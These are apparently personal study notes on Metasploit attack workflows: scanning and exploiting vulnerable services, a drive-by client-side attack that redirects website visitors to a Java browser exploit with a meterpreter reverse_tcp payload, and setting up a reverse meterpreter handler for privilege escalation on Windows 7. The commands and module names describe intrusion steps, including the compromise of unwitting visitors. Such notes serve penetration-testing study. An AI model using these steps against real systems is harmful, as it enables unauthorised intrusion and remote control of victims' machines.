Metasploit – Attacks

Direct Attack

The attack consists of locating a vulnerable service on a server and using an exploit to obtain access to the system.

Port scan and version scanners to identify service versions

Use auxiliary/scanner/portscan/tcp

Use auxiliary/scanner/smb/smb_version

Use auxiliary/scanner/http/http_version

Use show options and set <option> to configure the scanner module

Search for or download an exploit for the vulnerable service.

If it is not available in Metasploit, copy the .rb file into module/exploit/<system>/<service>/

use exploit/<system>/<service>/<exploit>

Use show options and set <option> to configure the exploit

Execute run or exploit

An easy example for trying this attack is the Easy File Management vulnerability.

Client Side Attack

It consists of waiting for clients to connect to a website, from which they are redirected to the Metasploit machine that is listening on a port. Metasploit then tries to run an exploit on the client machine.

Apache configuration

Set up a website with an iframe (or another element) pointing to port 8080 of the Metasploit machine

Configure a listening port in Metasploit, prepared to respond with the Java exploit

Use exploit/multi/browser/<exploit>

Set uripath /

Set payload java/meterpreter/reverse_tcp

Set target <- allows specifying the target system, which enables more payload options but limits the scope of the attack to that system only (show target, set target).

The client should access the website. The connection will be set up as a session in Metasploit.

As an option, initialautorunscript can be set in the payload to run a few commands as soon as the exploit runs on the client machine. This script can point to an rc file containing more than one command.
set initialautorunscript 'multi_console_command -rc /root/ncn.rc'

Java 7 Update 5 can be exploited, as an example, using the exploit java_jre17_jmxbean

Privilege escalation

When an exploit runs successfully on the victim, it usually gives the meterpreter or payload non-admin rights. To obtain Administrator or System rights, we need to perform a privilege escalation. The process depends on the victim system.

The attacker's objective is to get a Meterpreter console with System rights (the getuid command in the meterpreter console shows this information).

Windows 7 x64

Create a meterpreter payload application

use payload/windows/meterpreter/reverse_tcp

generate -f /root/test.exe (-> seems to create a 32-bit file... how to create this with 64 bits?)

Create a handler to listen for the reverse meterpreter

use exploit/multi/handler

exploit -j (runs it in the background)

Get a remote meterpreter shell by exploiting a known vulnerability (see direct attack or client-side attacks)